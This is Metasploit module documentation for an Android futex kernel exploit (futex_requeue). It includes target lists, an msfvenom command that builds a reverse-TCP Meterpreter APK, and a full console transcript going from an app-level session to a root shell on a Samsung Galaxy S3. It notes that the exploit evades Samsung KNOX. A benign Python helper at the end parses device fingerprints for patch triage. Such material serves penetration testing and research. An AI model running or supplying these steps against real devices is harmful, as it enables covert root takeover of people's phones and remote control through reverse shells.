Vulnerable Application
This module exploits a Linux kernel vulnerability in the futex system call; the affected code is also present in the Android kernel. At the time of writing it does not trip (set off) Samsung KNOX.
Failed exploitation attempts may reboot the device.
Verification Steps
Start msfconsole
Get a shell on a vulnerable android device
Do: use exploit/android/local/futex_requeue
Select an appropriate target
Do: set lhost [IP]
Do: run
You should get a root shell.
Targets
0 Automatic Targeting - attempt to automatically determine the target
1 Default - Nexus 4, 5, 7, etc.
2 New Samsung - Samsung S3, S4, S5, etc.
3 Old Samsung - Samsung Note 2, etc.
4 Samsung Grand - Samsung Grand, etc.
Scenarios
Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
The following command was used to generate a Meterpreter Android application, which was then installed on the device.
msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/android/local/futex_requeue
msf exploit(android/local/futex_requeue) > set session 1
session => 1
msf exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf exploit(android/local/futex_requeue) > check
[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
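The transcript above identifies the device by two strings: the Android build fingerprint (brand/product/device:release/id/incremental:type/tags) and the Meterpreter sysinfo OS line. The following Python helper is an added example, not part of the module, that parses both into one record for fleet inventory or patch triage and flags devices matching the profile observed in this scenario (Android 4.4.2 on a 3.4.0 kernel). The observed profile is taken only from this transcript and is not a substitute for a real vulnerability check.

```python
import re
from typing import NamedTuple, Tuple

# Android build fingerprint layout: brand/product/device:release/id/incremental:type/tags
FINGERPRINT_RE = re.compile(
    r"^(?P<brand>[^/]+)/(?P<product>[^/]+)/(?P<device>[^:]+):"
    r"(?P<release>[^/]+)/(?P<build_id>[^/]+)/(?P<incremental>[^:]+):"
    r"(?P<build_type>[^/]+)/(?P<tags>.+)$"
)
# Meterpreter "sysinfo" OS line, e.g. "OS : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)"
OS_LINE_RE = re.compile(r"Android\s+(?P<android>[\d.]+)\s+-\s+Linux\s+(?P<kernel>[\d.]+)")

# Profile seen in the transcript on this page (Android release, kernel base version).
OBSERVED_PROFILE = ("4.4.2", "3.4.0")


class DeviceProfile(NamedTuple):
    brand: str
    product: str
    device: str
    release: str
    build_id: str
    incremental: str
    build_type: str
    tags: str
    kernel: str


def version_tuple(version: str) -> Tuple[int, ...]:
    """Turn '3.4.0' into (3, 4, 0) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def build_profile(fingerprint: str, os_line: str) -> DeviceProfile:
    """Combine fingerprint and sysinfo OS line; reject inputs that do not parse or disagree."""
    fp = FINGERPRINT_RE.match(fingerprint.strip())
    os_match = OS_LINE_RE.search(os_line)
    if fp is None or os_match is None:
        raise ValueError("unrecognised fingerprint or OS line format")
    if fp.group("release") != os_match.group("android"):
        # The two sources should report the same Android release; a mismatch is worth a look.
        raise ValueError("fingerprint release and sysinfo Android version disagree")
    return DeviceProfile(*fp.groups(), kernel=os_match.group("kernel"))


def matches_observed_profile(profile: DeviceProfile) -> bool:
    """True when the device matches the release/kernel combination shown in this scenario."""
    release, kernel = OBSERVED_PROFILE
    return (version_tuple(profile.release) == version_tuple(release)
            and version_tuple(profile.kernel) == version_tuple(kernel))
```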